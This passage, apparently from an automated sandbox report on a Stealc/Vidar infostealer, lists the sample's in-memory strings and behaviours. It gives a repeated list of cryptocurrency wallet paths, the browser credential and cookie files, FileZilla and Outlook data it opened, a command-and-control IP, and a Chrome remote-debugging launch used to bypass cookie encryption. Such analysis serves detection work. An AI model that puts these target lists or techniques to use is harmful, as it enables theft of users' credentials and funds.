Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 16.113Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\.
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 185.215.113.16\AppData\Roaming\\MultiDoge\\multidoge.wallet
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-wal	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Searches for user specific document files

Source: C:\Users\user\Documents\KJJJKFIIIJ.exe

Directory queried: C:\Users\user\Documents

Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: 0.2.file.exe.3a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1970779986.0000000000474000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7688, type: MEMORYSTR

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.3a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1975584108.0000000000F2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1970779986.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7688, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 7688, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC40C40 sqlite3_bind_zeroblob,	0_2_6CC40C40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC40D60 sqlite3_bind_parameter_name,	0_2_6CC40D60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB68EA0 sqlite3_clear_bindings,	0_2_6CB68EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC40B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	0_2_6CC40B40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB66410 bind,WSAGetLastError,	0_2_6CB66410
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB660B0 listen,WSAGetLastError,	0_2_6CB660B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB6C030 sqlite3_bind_parameter_count,	0_2_6CB6C030
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB66070 PR_Listen,	0_2_6CB66070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB6C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,	0_2_6CB6C050
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAF22D0 sqlite3_bind_blob,	0_2_6CAF22D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB663C0 PR_Bind,	0_2_6CB663C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB69480 sqlite3_bind_null,	0_2_6CB69480
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB694F0 sqlite3_bind_text16,	0_2_6CB694F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB694C0 sqlite3_bind_text,	0_2_6CB694C0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_00A3EC48 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,	20_2_00A3EC48
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_00A3DF51 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::GetInternalContext,	20_2_00A3DF51

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
